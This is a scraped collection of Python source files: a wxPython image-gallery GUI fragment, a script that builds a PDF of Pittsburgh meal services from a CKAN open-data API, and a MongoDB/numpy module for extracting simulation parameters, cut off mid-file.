self.SetSizer(self._vsizer)\n \n def __EventHandlers(self):\n self.Bind(wx.EVT_TOOL, self.__OnToolbarPushed) \n \nclass ViewData(gridlib.PyGridTableBase):\n def __init__(self, item_size):\n gridlib.PyGridTableBase.__init__(self) \n \n _program_dir = os.path.split(__file__)[0] \n self.data = list()\n for fn in os.listdir(os.path.join(_program_dir, '../design/caps')):\n path = os.path.join(_program_dir, '../design/caps', fn)\n self.data.append(path) \n \n self.item_size = item_size \n self.cols = 0\n self.rows = 0 \n \n def ResetView(self, grid):\n grid.BeginBatch() \n if self.cols > grid.cols_best_amount:\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_COLS_DELETED, grid.cols_best_amount, self.cols - grid.cols_best_amount)\n self.GetView().ProcessTableMessage(msg)\n elif self.cols < grid.cols_best_amount:\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_COLS_INSERTED, self.cols, grid.cols_best_amount - self.cols)\n self.GetView().ProcessTableMessage(msg) \n self.cols = grid.cols_best_amount \n if self.cols:\n rows_best_amount = ceil(float(len(self.data)) / self.cols)\n else:\n rows_best_amount = 0 \n if self.rows > rows_best_amount:\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_DELETED, rows_best_amount, self.rows - rows_best_amount)\n self.GetView().ProcessTableMessage(msg)\n elif self.rows < rows_best_amount:\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_INSERTED, self.rows, rows_best_amount - self.rows)\n self.GetView().ProcessTableMessage(msg) \n self.rows = rows_best_amount \n grid.EndBatch() \n \n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_REQUEST_VIEW_GET_VALUES)\n grid.ProcessTableMessage(msg) \n\n def GetAttr(self, row, col, kind):\n attr = gridlib.GridCellAttr() \n attr.SetReadOnly(True)\n return attr\n \n def GetNumberRows(self):\n return self.rows \n\n def GetNumberCols(self):\n return self.cols \n\n def IsEmptyCell(self, row, col):\n return False\n\n def GetValue(self, row, col):\n return ''\n \n def GetRawValue(self, row, col): \n return False\n\n def SetValue(self, row, col, value):\n return None\n \nclass GallaryView(gridlib.Grid):\n def __init__(self, parent, item_size):\n gridlib.Grid.__init__(self, parent, -1, style=wx.SIMPLE_BORDER) \n\n self.item_size = item_size\n self.__Appearance() \n self.table = ViewData(item_size)\n self.SetTable(self.table, True)\n self.cols_best_amount = (self.Parent.Parent.ClientSize[0] - self.Parent.Parent.navigation.MinWidth) / item_size\n self.Reset() \n\n def __Appearance(self):\n self.HideRowLabels()\n self.HideColLabels() \n self.SetDefaultEditor(None)\n self.DefaultRowSize = self.item_size\n self.DefaultColSize = self.item_size \n self.DisableDragRowSize()\n self.DisableDragColSize()\n self.SetDefaultCellBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DFACE))\n self.ClearBackground()\n self.DefaultRenderer = ItemPictureRenderer(self.item_size)\n \n def Reset(self):\n self.table.ResetView(self) \n \nclass ItemPictureRenderer(gridlib.PyGridCellRenderer):\n def __init__(self, item_size):\n gridlib.PyGridCellRenderer.__init__(self)\n \n self.item_size = item_size \n _sel_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_HOTLIGHT) \n _sel_color.Set(_sel_color.red, _sel_color.green, _sel_color.blue, 92)\n self.sel_brush = wx.Brush(_sel_color)\n self.sel_pen = wx.Pen(_sel_color) \n _bg_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DFACE) \n self.bg_brush = wx.Brush(_bg_color)\n self.bg_pen = wx.Pen(_bg_color)\n\n def Draw(self, grid, attr, dc, rect, row, col, isSelected):\n data_index = grid.table.cols * row + col\n if data_index < len(grid.table.data): \n bmp = wx.Bitmap(grid.table.data[data_index], wx.BITMAP_TYPE_JPEG) \n image = wx.ImageFromBitmap(bmp)\n image = image.Scale(self.item_size, self.item_size, wx.IMAGE_QUALITY_HIGH)\n bmp = wx.BitmapFromImage(image) \n dc.DrawBitmap(bmp, rect.x, rect.y)\n if isSelected:\n try:\n dc = wx.GCDC(dc)\n except:\n pass\n else: \n dc.SetPen(self.sel_pen)\n dc.SetBrush(self.sel_brush)\n dc.DrawRectangleRect(rect)\n else:\n dc.SetPen(self.bg_pen)\n dc.SetBrush(self.bg_brush)\n dc.DrawRectangleRect(rect)\n \nclass ListViewCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):\n def __init__(self, parent, ID, pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):\n wx.ListCtrl.__init__(self, parent, ID, pos, size, style)\n listmix.ListCtrlAutoWidthMixin.__init__(self)\n \nclass ListView(wx.Panel, listmix.ColumnSorterMixin):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent, -1, style=wx.WANTS_CHARS)\n \n self.il = wx.ImageList(16, 16)\n self.il.Add(resources.empty_icon.GetBitmap())\n self.up = self.il.Add(resources.filter_up.GetBitmap())\n self.dn = self.il.Add(resources.filter_down.GetBitmap())\n self.list = ListViewCtrl(self, -1, style=wx.LC_REPORT | wx.SIMPLE_BORDER | wx.LC_EDIT_LABELS | wx.LC_SORT_ASCENDING)\n self.list.SetImageList(self.il, wx.IMAGE_LIST_SMALL)\n \n i = 0\n _program_dir = os.path.split(__file__)[0] \n self.itemDataMap = {}\n for fn in os.listdir(os.path.join(_program_dir, '../design/caps')): \n self.itemDataMap[i] = (fn, \"Line {0}\".format(i+1))\n i += 1 \n self.PopulateList()\n \n listmix.ColumnSorterMixin.__init__(self, 3)\n self.__DoLayout()\n\n def __DoLayout(self):\n sizer = wx.BoxSizer(wx.VERTICAL) \n sizer.Add(self.list, 1, wx.EXPAND)\n self.SetSizer(sizer) \n self.SetAutoLayout(True)\n\n def PopulateList(self):\n info = wx.ListItem()\n info.m_mask = wx.LIST_MASK_TEXT | wx.LIST_MASK_IMAGE | wx.LIST_MASK_FORMAT\n info.m_image = -1\n info.m_format = 0\n info.m_text = \"File name\"\n self.list.InsertColumnInfo(0, info)\n info.m_text = \"Column 2\"\n self.list.InsertColumnInfo(1, info) \n for k, v in self.itemDataMap.items():\n index = self.list.InsertStringItem(sys.maxint, v[0])\n self.list.SetStringItem(index, 1, v[1])\n self.list.SetItemData(index, k)\n self.list.SetColumnWidth(0, 100)\n self.list.SetColumnWidth(1, wx.LIST_AUTOSIZE) \n self.currentItem = 0\n \n def GetListCtrl(self):\n return self.list\n\n def GetSortImages(self):\n return (self.dn, self.up)\n \nif __name__ == '__main__':\n class TestApp(wx.App):\n def OnInit(self):\n self.frame = MainFrame(None)\n self.SetTopWindow(self.frame)\n self.frame.Show()\n return True\n test_app = TestApp(False)\n test_app.MainLoop()","sub_path":"capsnavigator/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":17492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"150319938","text":"import re, csv, sys\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.enums import TA_JUSTIFY\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nimport ckanapi\nfrom pprint import pprint\nfrom datetime import datetime\n\ndef get_resource_data(site,resource_id,API_key=None,count=50,offset=0,fields=None):\n # Use the datastore_search API endpoint to get records from\n # a CKAN resource starting at the given offset and only returning the\n # specified fields in the given order (defaults to all fields in the\n # default datastore order).\n ckan = ckanapi.RemoteCKAN(site, apikey=API_key)\n if fields is None:\n response = ckan.action.datastore_search(id=resource_id, limit=count, offset=offset)\n else:\n response = ckan.action.datastore_search(id=resource_id, limit=count, offset=offset, fields=fields)\n # A typical response is a dictionary like this\n #{u'_links': {u'next': u'/api/action/datastore_search?offset=3',\n # u'start': u'/api/action/datastore_search'},\n # u'fields': [{u'id': u'_id', u'type': u'int4'},\n # {u'id': u'pin', u'type': u'text'},\n # {u'id': u'number', u'type': u'int4'},\n # {u'id': u'total_amount', u'type': u'float8'}],\n # u'limit': 3,\n # u'records': [{u'_id': 1,\n # u'number': 11,\n # u'pin': u'0001B00010000000',\n # u'total_amount': 13585.47},\n # {u'_id': 2,\n # u'number': 2,\n # u'pin': u'0001C00058000000',\n # u'total_amount': 7827.64},\n # {u'_id': 3,\n # u'number': 1,\n # u'pin': u'0001C01661006700',\n # u'total_amount': 3233.59}],\n # u'resource_id': u'd1e80180-5b2e-4dab-8ec3-be621628649e',\n # u'total': 88232}\n data = response['records']\n return data\n\ndef get_services(site):\n resource_id = \"5a05b9ec-2fbf-43f2-bfff-1de2555ff7d4\"\n data = get_resource_data(site,resource_id,count=9999999)\n return data\n\ndef extend_story(Story,line,indent=None):\n if line == \"\":\n Story.append(Spacer(1, 12))\n else:\n styles=getSampleStyleSheet()\n #styles.add(ParagraphStyle(name='Justify', alignment=TA_JUSTIFY, fontName='SourceSansPro-Bold', fontSize=10, leftIndent=1))\n left_indent = 0\n if indent is not None:\n left_indent = indent\n if re.search(\"Recommended\",line) is not None:\n left_indent = 18\n if re.search(\"Requirements\",line) is not None:\n left_indent = 18\n styles.add(ParagraphStyle(name='Justify-and-Indent', alignment=TA_JUSTIFY, fontSize=10, leftIndent=left_indent))\n #ptext = '{}'.format(line)\n ptext = '{}'.format(line)\n Story.append(Paragraph(ptext, styles[\"Justify-and-Indent\"]))\n\ndef format_meals(meals,Story,keep_kids_only=True,keep_pets_only=True,hoods=None):\n from collections import defaultdict\n ms_by_hood = defaultdict(list)\n for m in meals:\n store = True\n if not keep_kids_only:\n if m['requirements'] is not None and re.search('kids',m['requirements'], re.IGNORECASE) is not None:\n store = False\n\n if not keep_pets_only:\n if m['recommended_for'] is not None and m['recommended_for'] == 'all pets in need':\n store = False\n\n if store:\n ms_by_hood[m['neighborhood'].upper()].append(m)\n\n if hoods is None:\n hoods = ms_by_hood.keys()\n else:\n hoods = [h.upper() for h in hoods]\n\n transmitted_ms = []\n for j,hood in enumerate(sorted(ms_by_hood.keys())):\n if hood in hoods:\n extend_story(Story, \"{}\".format(hood))\n ms = ms_by_hood[hood]\n for k,m in enumerate(ms):\n transmitted_ms.append(m)\n extend_story(Story, \" {} ({})\".format(m['service_name'],m['address']))\n holiday_exception = \" ({})\".format(m['holiday_exception']) if m['holiday_exception'] is not None else \"\"\n extend_story(Story, \" {}{}\".format(m['schedule'], holiday_exception))\n extend_story(Story, \" {}\".format(m['narrative']), 9)\n requirements = m['requirements']\n if requirements not in [None,'none','None']:\n extend_story(Story, \" Requirements: {}\".format(requirements))\n recommended_for = m['recommended_for']\n if recommended_for not in ['all','All in need','all who need food']:\n extend_story(Story, \" Recommended for: {}\".format(recommended_for))\n if k != len(ms)-1:\n extend_story(Story, \"\")\n\n if j != len(ms_by_hood)-1:\n extend_story(Story, \"\")\n\n return transmitted_ms\n\nif len(sys.argv) == 1:\n hoods = None\nelse:\n hoods_args = sys.argv[1:]\n hoodstring = ' '.join(hoods_args)\n hoods = hoodstring.split(', ')\n\n\nsite = \"https://data.wprdc.org\"\nservices = get_services(site)\n\ndoc = SimpleDocTemplate(\"meals.pdf\",pagesize=letter,\n rightMargin=52,leftMargin=52,\n topMargin=72,bottomMargin=18)\nStory=[]\nwidth, height = letter\ntitle = \"==== Meal/food opportunities extracted from Social Service listings from BigBurgh.com ====\"\nstyles=getSampleStyleSheet()\nStory.append(Paragraph(title, styles[\"Normal\"]))\n\n\nmeals = [s for s in services if re.search('meals', s['category'])]\nfiltered_meals = format_meals(meals,Story,keep_kids_only=False,keep_pets_only=False,hoods=hoods)\n\nfooter = \"[This information was obtained for {} from https://data.wprdc.org/dataset/bigburgh-social-service-listings]\".format(datetime.strftime(datetime.now(),\"%b %Y\"))\nfoooter = \"{}\".format(footer)\nStory.append(Paragraph(footer, styles[\"Normal\"]))\ndoc.build(Story)\nprint(\"{} meal/pantry locations found in {} neighborhoods.\".format(len(filtered_meals),len(hoods)))\n\n# > python make_printout.py Squirrel Hill, Wilkinsburg, Downtown\n","sub_path":"build_printout.py","file_name":"build_printout.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"53165439","text":"import re\nimport numpy as np\nfrom copy import deepcopy\nimport pymongo\n\nimport Config.config as config\n\nfrom Calculus.calculus import Calculus\nfrom DB.Mongo.Mongo import Mongo\nfrom Utils.dict_manipulations import flatten\nfrom Calculus.CalcVar import CalcVar\nfrom Utils.Numpy import div0\n\n\nif __debug__:\n import logging\n logger = logging.getLogger(__name__)\n\n\nclass ExtractSimulationParameters(Calculus):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # Always skip hash/cache because we return custom param matrix\n self._skip_cache = True\n self._skip_hash = True\n\n def _run(self, request, milestones_date, **kwargs):\n # Extract value in dict for simulation and construct initial param matrix\n if __debug__:\n logger.info('Extracting Parameters')\n\n extractMilestoneParam = self.calculus('Simulation.ExtractSimulationMilestoneParameters')\n milestones = request['parameters']\n default_vals = self.calculus('Simulation.DefaultValues', simu_specific=True)\n simu_defaults, pct_rep_w = self.get_variable(default_vals(request['default_values'], request['parameters']))\n self.simdef = simu_defaults\n self.pctrepw = pct_rep_w\n\n ret = {}\n simu_territory_groups = {}\n milestones = milestones + [{}] * (len(milestones_date) - len(milestones))\n for ind, milestone in enumerate(milestones):\n milestone_date = milestones_date[ind]\n paramsMilestoneSimu = extractMilestoneParam(milestone, milestone_date, simu_defaults[ind], pct_rep_w)\n vParamsMilestoneSimu = self.get_variable(paramsMilestoneSimu)\n # terr_groups = self.get_variable(vParamsMilestoneSimu['territory_groups'])\n # simu_territory_groups.update(terr_groups)\n hypos = vParamsMilestoneSimu['param_matrix']\n for hypo, mat in hypos.items():\n if hypo in ret:\n ret[hypo].append(mat)\n else:\n ret[hypo] = [mat]\n return {'territory_groups': simu_territory_groups, 'param_matrix': ret}\n\n\nclass DefaultValues(Calculus):\n '''\n gerer subgroup avec abs_val\n ajouter percent_repartition\n '''\n\n def __init__(self, *args, **kwargs):\n '''\n '''\n super().__init__(*args, **kwargs)\n self.def_mat = self._cache.get_val('Hypothesis:Default').copy()\n self.tot_order = self._cache.get_val('Hypothesis:Default:Order').copy()\n self.geo_idx = self._cache.get_val('geocodes_indexes')\n self.cty_idx = self._cache.get_val('counties_indexes')\n self.def_types = self._cache.get_val('Hypothesis:Default:Types')\n self.set_percent_repartition = {}\n self.geocodes = self._cache.get_val('geocodes')\n self._mongo = Mongo(database=config.MONGODB_INIT_DB, collection=config.__INIT_COLLECTIONS__['main'])\n self.pct_rep_weights = {}\n\n def _run(self, def_vals, parameters):\n '''\n '''\n self.def_vals = def_vals\n ret = []\n for paramM in parameters:\n self.update_default_oneMilestone(paramM, mytype='values')\n self.update_default_oneMilestone(paramM, mytype='subgroup')\n self.build_percent_repartitions()\n ret.append(self.def_mat.copy())\n return ret, self.pct_rep_weights\n\n def update_default_oneMilestone(self, paramM, mytype='values'):\n '''\n '''\n storage = {}\n for sector in paramM:\n for categ in paramM[sector]:\n sector_name = sector + '_' + categ['category']\n storage[sector_name] = {}\n for terrgroup in categ['territory_groups']:\n if mytype == 'values':\n self.terrgroup_update(sector_name, terrgroup, categ, storage)\n if mytype == 'subgroup':\n self.subgroup_update(sector_name, terrgroup, categ, storage)\n for sector_name in storage:\n self.update_oneparam_geo(sector_name, storage[sector_name])\n\n def build_percent_repartitions(self):\n for sector_name, params in self.set_percent_repartition.items():\n self.pct_rep_weights[sector_name] = {}\n tempcalc = CalcVar(None, self.def_mat[sector_name], random_name=True)\n mymat = self.get_variable(tempcalc).copy()\n for param_name in params:\n self.default_from_db(sector_name, param_name, mymat)\n tempmat = CalcVar(None, mymat, random_name=True)\n tempmat.sync_cache(self._cache, remote=True)\n self.def_mat[sector_name] = tempmat.name\n\n def default_from_db(self, sector_name, param_name, mymat):\n idx = self.tot_order[sector_name][param_name]\n\n query = {'geocode_insee': {'$in': list(self.cty_idx.keys())}}\n proj = {'geocode_insee': 1, sector_name + '_' + param_name: 1}\n sort = ('geocode_insee', pymongo.DESCENDING)\n docs = self._mongo.find(query=query, projection=proj, sort=sort)\n for doc in docs:\n idxini = self.cty_idx[doc['geocode_insee']]['start']\n idxend = self.cty_idx[doc['geocode_insee']]['end']\n val = doc[sector_name + '_' + param_name]['default']\n if val == 0:\n val = config.NONZERO_VAL\n mymat[idxini:idxend, idx] = val\n\n query = {'geocode_insee': {'$in': self.geocodes}}\n proj = {'geocode_insee': 1, sector_name + '_' + param_name: 1}\n docs = self._mongo.find(query=query, projection=proj)\n fieldname = None\n if docs[0][sector_name + '_' + param_name]['operation_type'][1]:\n fieldname = docs[0][sector_name + '_' + param_name]['operation_type'][1]\n else:\n fieldname = 'Population du territoire'\n self.pct_rep_weights[sector_name][param_name] = np.ones((len(self.geocodes),))\n if docs.count() != len(self.geocodes):\n raise\n for doc in docs:\n val = doc[sector_name + '_' + param_name]['default']\n if val == 0:\n val = config.NONZERO_VAL\n mymat[self.geo_idx[doc['geocode_insee']], idx] = val\n if fieldname:\n mygeoidx = self.geo_idx[doc['geocode_insee']]\n tempname = sector_name + '_' + param_name\n self.pct_rep_weights[sector_name][param_name][mygeoidx] = doc[tempname]['metadata'][fieldname][0]\n\n def param_name_builder(self, prefix, val_dict, list_init):\n for key, val in val_dict.items():\n if isinstance(val, dict):\n self.param_name_builder(prefix + '_' + key, val, list_init)\n else:\n param_name = prefix + '_' + key\n list_init.append(param_name)\n\n def terrgroup_update(self, sector_name, terrgroup, categ, storage):\n '''\n '''\n list_init = []\n if 'values' in terrgroup:\n self.param_name_builder(categ['subcategory'], terrgroup['values'], list_init)\n for param_name in list_init:\n if self.def_types[sector_name][param_name] == 'percent_repartition':\n if sector_name in self.set_percent_repartition:\n self.set_percent_repartition[sector_name].update({param_name})\n else:\n self.set_percent_repartition[sector_name] = {param_name}\n else:\n default_terr = self.compute_default_terrgroup(sector_name, param_name, terrgroup)\n tempdict = {geo: default_terr for geo in terrgroup['geocodes']}\n if param_name in storage[sector_name]:\n storage[sector_name][param_name].update(tempdict)\n else:\n storage[sector_name][param_name] = tempdict\n\n def subgroup_update(self, sector_name, terrgroup, categ, storage):\n '''\n '''\n if 'subgroup' in terrgroup:\n for geo in terrgroup['subgroup']:\n list_init = []\n self.param_name_builder(categ['subcategory'], terrgroup['subgroup'][geo]['values'], list_init)\n for param_name in list_init:\n if self.def_types[sector_name][param_name] == 'percent_repartition':\n if sector_name in self.set_percent_repartition:\n self.set_percent_repartition[sector_name].update({param_name})\n else:\n self.set_percent_repartition[sector_name] = {param_name}\n else:\n default_terr = self.compute_default_terrgroup(sector_name, param_name, terrgroup)\n tempdict = {geo: default_terr}\n if param_name in storage[sector_name]:\n storage[sector_name][param_name].update(tempdict)\n else:\n storage[sector_name][param_name] = tempdict\n\n def update_oneparam_geo(self, sector_name, mydict):\n '''\n '''\n tempcalc = CalcVar(None, self.def_mat[sector_name], random_name=True)\n mymat = self.get_variable(tempcalc).copy()\n for param_name in mydict:\n idx = self.tot_order[sector_name][param_name]\n if self.def_types[sector_name][param_name] != 'abs_val':\n for geo in sorted(mydict[param_name].keys(), reverse=True):\n val = mydict[param_name][geo]\n # cope with 0, as we have ratios, to avoid neutral element initialisation\n if self.def_types[sector_name][param_name] == 'percent_repartition' and val == 0:\n val = config.NONZERO_VAL\n if geo in self.cty_idx:\n idxini = self.cty_idx[geo]['start']\n idxend = self.cty_idx[geo]['end']\n mymat[idxini:idxend, idx] = val\n else:\n mymat[self.geo_idx[geo], idx] = val\n else:\n mymat[:, idx] = np.zeros(mymat[:, idx].shape)\n # for geo in sorted(mydict[param_name].keys(), reverse=True):\n # val = mydict[param_name][geo]\n # if geo in self.cty_idx:\n # idxini = self.cty_idx[geo]['start']\n # idxend = self.cty_idx[geo]['end']\n # mymat[idxini:idxend, idx] = val\n # else:\n # mymat[self.geo_idx[geo], idx] = val\n tempmat = CalcVar(None, mymat, random_name=True)\n tempmat.sync_cache(self._cache, remote=True)\n self.def_mat[sector_name] = tempmat.name\n\n def compute_default_terrgroup(self, sector_name, param_name, terrgroup):\n '''\n '''\n if sector_name + '_' + param_name in self.def_vals:\n sub_def_vals = self.def_vals[sector_name + '_' + param_name]\n else:\n print('MISSING variable', sector_name + '_' + param_name)\n sub_def_vals = {}\n for geo in terrgroup['geocodes']:\n sub_def_vals[geo] = {'default': 0.000000001,\n 'unit': 'base 100 en 2015',\n 'operation_type': ['mean', ''],\n 'type': 'percent_repartition',\n 'min': 0.0, 'metadata': {'Population du territoire': [10832.0, 'sum']},\n 'max': 100.0}\n list_defvals = []\n list_weights = []\n for geo in terrgroup['geocodes']:\n list_defvals.append(sub_def_vals[geo]['default'])\n if sub_def_vals[geo]['operation_type'][0] == 'mean':\n if sub_def_vals[geo]['operation_type'][1]:\n list_weights.append(sub_def_vals[geo]['metadata'][sub_def_vals[geo]['operation_type'][1]][0])\n else:\n list_weights.append(1)\n if sub_def_vals[geo]['operation_type'][0] == 'mean':\n return np.average(np.array(list_defvals), weights=np.array(list_weights))\n elif sub_def_vals[geo]['operation_type'][0] == 'sum':\n return np.array(list_defvals).sum()\n else:\n raise ValueError('Operation type is not mean nor sum : %s' % (sub_def_vals[geo]['operation_type'][0]))\n\n\nclass TerritoryGroups(Calculus):\n\n def _run(self, parameters, **kwargs):\n territorygroups = {}\n # self._cache.get_val('SimuParameters:%s' % (self._simu_id))\n param = self.get_variable(parameters)\n # Create updateVects : list of update in column1s of the matrix\n for section, hypotheses in param.items():\n for hypo in hypotheses:\n for territory in hypo['territory_groups']:\n if __debug__:\n logger.debug('Territory groups: %s', territory)\n if territory['id'] != 'country':\n try:\n territorygroups[territory['id']]\n except KeyError:\n territorygroups[territory['id']] = territory['geocodes']\n return territorygroups\n\n\nclass ExtractSimulationMilestoneParameters(Calculus):\n\n def __init__(self, *args, **kwargs):\n '''\n gerer subgroup avec abs_val\n ajouter percent_repartition\n '''\n super().__init__(*args, **kwargs)\n # Always skip hash/cache because we return custom param matrix\n self._skip_cache = True\n self._skip_hash = True\n\n def _run(self, parameters, milestone_date, simu_defaults, pct_rep_w, **kwargs):\n '''\n For a given milestone compute the hypo ratios with respect to default values\n\n Parameters\n ----------\n parameters : dict\n dict of hypo for the associated milestone corresponding to the json sent by the saas\n\n milestone_date : datetime.datetime\n corresponding to the milestone\n\n simu_defaults : dict\n contains the computed default values, similar to 'Hypothesis:Default'\n\n Returns\n -------\n None\n '''\n self.set_types = self._cache.get_val('Hypothesis:Default:Absval')\n self.def_mat_ones = self._cache.get_val('Hypothesis:Default:Ones').copy()\n self.geo_idx = self._cache.get_val('geocodes_indexes')\n self.cty_idx = self._cache.get_val('counties_indexes')\n self.geocodes = self._cache.get_val('geocodes')\n self.tot_order = self._cache.get_val('Hypothesis:Default:Order')\n self.def_types = self._cache.get_val('Hypothesis:Default:Types')\n self.def_mat = simu_defaults.copy()\n self.pct_rep_w = pct_rep_w\n if __debug__:\n logger.info('Extracting Milestone Parameters :%s', milestone_date)\n\n # terr_groups = self.calculus('Simulation.TerritoryGroups', simu_specific=True)\n # simu_territory_groups = terr_groups(parameters=parameters)\n\n # defaults_ratios = self.def_mat_ones.copy()\n # defaults_vals = self.def_mat.copy()\n for hyp_name, hyp_ones in self.def_mat_ones.items():\n if __debug__:\n logger.info('Treating matrix %s', hyp_name)\n hyp_ones = self.default_ratios_builder(hyp_name, hyp_ones)\n self.def_mat_ones[hyp_name] = hyp_ones\n self.compute_ratios_from_params(hyp_name, parameters)\n return {'territory_groups': {}, 'param_matrix': self.def_mat_ones}\n\n def compute_ratios_from_params(self, hyp_name, parameters):\n ''' Computes the ratio of configured params to default values in order to perform the simulation\n\n Parameters\n ----------\n hyp_name : string\n hypothesis name, for example 'Demand_Tertiary_Consumption_Lighting'\n\n Returns\n -------\n None\n '''\n splitname = hyp_name.split('_')\n (var, cat) = ('_'.join(splitname[:-1]), splitname[-1])\n if var in parameters:\n params_var = parameters[var]\n else:\n return None\n hyp_reorder = self.reorder_params(hyp_name, params_var)\n if cat in hyp_reorder:\n hyp_cat = hyp_reorder[cat]\n else:\n return None\n def_vals_hyp = self.get_variable(CalcVar(None, self.def_mat[hyp_name], random_name=True))\n temp_value = self._update_cat_hyp(hyp_name, hyp_cat, def_vals_hyp)\n retMat = CalcVar(None, temp_value, random_name=True)\n coeffs_from_request = self.override_subcat_all(temp_value, self.tot_order[hyp_name], hyp_cat)\n retMat_ones = CalcVar(None, coeffs_from_request, random_name=True)\n if retMat._get_value(self._cache) is not None:\n self.def_mat_ones[hyp_name] = retMat_ones\n retMat_ones.sync_cache(self._cache)\n else:\n if __debug__:\n logger.error('Update Simu Param Matrix return none for hypothese %s', hyp_name)\n pass\n\n def override_subcat_all(self, coeffs, order, hyp_cat):\n '''\n Update all subcats in one go if one of the hyp is on subcat 'All'\n\n Parameters\n ----------\n coeffs :\n\n\n order : dict\n param_name and index of the corresponding np.ndarray for the current sector\n\n hyp_cat : dict\n reordered dict of hypothesis\n\n\n Returns\n -------\n dict\n nested dict with cat and subcat as keys instead of flat dict\n '''\n subcats = {key.split('_', 1)[0] for key in order.keys()}\n if 'All' in subcats:\n subcats_with_hypo = set(hyp_cat.keys())\n subcats_with_hypo.discard('All')\n subcats_without_all = subcats.copy()\n subcats_without_all.remove('All')\n variables = {key.split('_', 1)[1] for key in order.keys()}\n new_coeffs = coeffs.copy()\n for var in variables:\n for subcat in subcats_without_all:\n new_coeffs[:, order['_'.join([subcat, var])]] = coeffs[:, order['_'.join(['All', var])]]\n for subcat in subcats_with_hypo:\n new_coeffs[:, order['_'.join([subcat, var])]] = coeffs[:, order['_'.join([subcat, var])]]\n return new_coeffs\n else:\n return coeffs\n\n def reorder_params(self, hyp_name, params_var):\n ''' Reorders parameters from the json, in order to use category and subcats as keys of nested dict\n\n {'category': 'Consumption', 'subcategory': 'coach', 'territory_groups': [{'geocodes': ['FR99999']}]}\n becomes\n {'Consumption': {'coach': [{'geocodes': ['FR99999']}]}}\n\n Parameters\n ----------\n params_var : dict\n parameter values for one hypothesis\n\n Returns\n -------\n dict\n nested dict with cat and subcat as keys instead of flat dict\n '''\n ret = {}\n for hypo in params_var:\n cur = ret.get(hypo['category'], {})\n if __debug__:\n logger.debug('Cat : %s , hypo => %s', hypo['category'], cur)\n cur[hypo['subcategory']] = hypo['territory_groups']\n ret[hypo['category']] = cur\n hyp_sel = ret\n if __debug__:\n logger.debug('Construction of hypothese of %s : %s', hyp_name, ret)\n return ret\n\n def default_ratios_builder(self, hyp_name, hyp_ones):\n ''' Returns a CalcVar matrix of ones, allowing for abs_val to default at 0\n\n 'Hypothesis:Default:Ones' returns a dict of hashed varnames for every hypothesis\n Every variable corresponding to such varname is a np.array at 1 with proper shape\n Here we wrap the varname in a CalcVar object\n We also take care of replacing default value to 0 for abs_val parameters\n\n Parameters\n ----------\n hyp_name : string\n hypothesis name, for example 'Demand_Tertiary_Consumption_Lighting'\n\n Returns\n -------\n CalcVar\n We go from a simple variable name to a CalcVar containing the values with\n inserted 0 in the case of abs_val\n '''\n if self.set_types[hyp_name]:\n hyp_ones = self.get_variable(CalcVar(None, hyp_ones, random_name=True))\n hyp_ones[:, self.set_types[hyp_name]] = 0\n hyp_ones = CalcVar(None, hyp_ones, random_name=True)\n else:\n hyp_ones = CalcVar(None, hyp_ones, random_name=True)\n return hyp_ones\n\n def _update_cat_hyp(self, hyp_name, hyp_cat, def_vals_hyp):\n '''\n Update default values with config values, first on territory groups then on subgroup\n\n Parameters\n ----------\n hyp_name : string\n hypothesis name, for example 'Demand_Tertiary_Consumption_Lighting'\n\n hyp_cat : dict\n containing reorganised parameter dict with subcat as keys\n\n def_vals_hyp : np.ndarray\n (36k,n) n being the number of params for sector_categ, containing default values\n\n Returns\n -------\n np.ndarray\n default values updated with hypothesis values\n '''\n # Create a new matrix from default one\n ret = def_vals_hyp.copy()\n if __debug__:\n logger.debug('hyp_name : %s | hypotheses : %s', hyp_name, hyp_cat)\n for subcat, territories in hyp_cat.items():\n # for subcat find geocodes (part of territory group or independant) for which said hyp has config values\n set_indices = self._territorygroup_update(hyp_name, subcat, territories, ret)\n for i in range(ret.shape[1]):\n if i not in set_indices:\n ret[:, i] = div0(ret[:, i], def_vals_hyp[:, i], replacement=1)\n return ret\n\n def _territorygroup_update(self, hyp_name, subcat, territories, ret):\n '''\n Update default values with config values, in the case of regular oldschool hypos\n\n Parameters\n ----------\n hyp_name : string\n hypothesis name, for example 'Demand_Tertiary_Consumption_Lighting'\n\n subcat : dict\n subcat name, like 'House'\n\n territories : dict\n containing the parameters for given hyp_name and subcat\n\n ret : np.ndarray\n hypos for hyp_name\n\n Returns\n -------\n None\n '''\n sterritories = {}\n for territory in territories:\n if __debug__:\n logger.debug('Territory : %s', territory)\n val_dict = {}\n list_geo = []\n if 'values' in territory:\n val_dict = territory['values']\n list_geo = territory['geocodes']\n subgroup = []\n if 'subgroup' in territory:\n subgroup = territory['subgroup']\n self._dispatch_hypos_togeo(hyp_name, subcat, list_geo, val_dict,\n sterritories, subgroup, self.def_types[hyp_name])\n if __debug__:\n logger.debug('Splitted hypotheses %s', sterritories)\n set_indices, index_abs_val = self._update_bygeo(sterritories, hyp_name, ret)\n index_abs_val = set(index_abs_val)\n self._update_abs_param(hyp_name, sterritories, index_abs_val, ret)\n return set_indices\n\n def _update_bygeo(self, sterritories, hyp_name, ret):\n '''\n Update default values in reverse geo order\n\n Parameters\n ----------\n hyp_name : string\n hypothesis name, for example 'Demand_Tertiary_Consumption_Lighting'\n\n sterritories : dict\n built to list geocode and value, i.e. unwrapping individual geocodes contained in a territory group\n\n ret : np.ndarray\n hypos for 